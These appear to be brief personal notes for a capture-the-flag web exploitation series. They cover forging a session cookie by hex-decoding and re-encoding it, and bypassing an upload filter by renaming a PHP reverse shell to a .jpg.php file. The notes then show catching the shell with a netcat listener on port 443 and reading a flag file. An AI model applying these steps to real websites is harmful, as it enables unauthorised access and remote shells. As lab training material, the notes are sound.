[Day 1] Web Exploitation: A Christmas Crisis [encoding]
- Register and log in
- Check cookies
- Decode using Cyberchef
- All numbers and early-in-the-alphabet letters → hex
- Recognise format
- Adjust username and re-encode using Cyberchef
- Replace cookie value and refresh page
- Turn everything on → success!
[Day 2] Web Exploitation: The Elf Strikes Back! [file upload]
- Create exploit script as described
- Go to URL including GET request
http://<url>/?id=<id-token>
- Check source code for upload types
- Rename script to bypass filter
$ mv php-reverse-shell.php php-reverse-shell.jpg.php
- Upload file. Simple message "File received successfully!"
- Check Burp Suite history - the POST was to
/upload
, so perhaps /uploads/
? Test: http://10.10.35.237/uploads/
→ success!
- Also checked page source, find
http://10.10.35.237/assets/js/upload.js
. It's obfuscated, but so use https://beautifier.io/ and http://jsnice.org/ to make sense of it. However, doesn't seem to give much.
- Hints suggest using a directory brute-forcer
- Set up netcat listener:
$ sudo nc -lvnp 443
- Click file from
http://10.10.35.237/uploads/
, or visit full URL http://10.10.35.237/uploads/php-reverse-shell.jpg.php
- Check netcat, find shell
sh-4.4$ cat /var/www/flag.txt
→ success!
[Day 3] Web Exploitation: Christmas Chaos [brute force]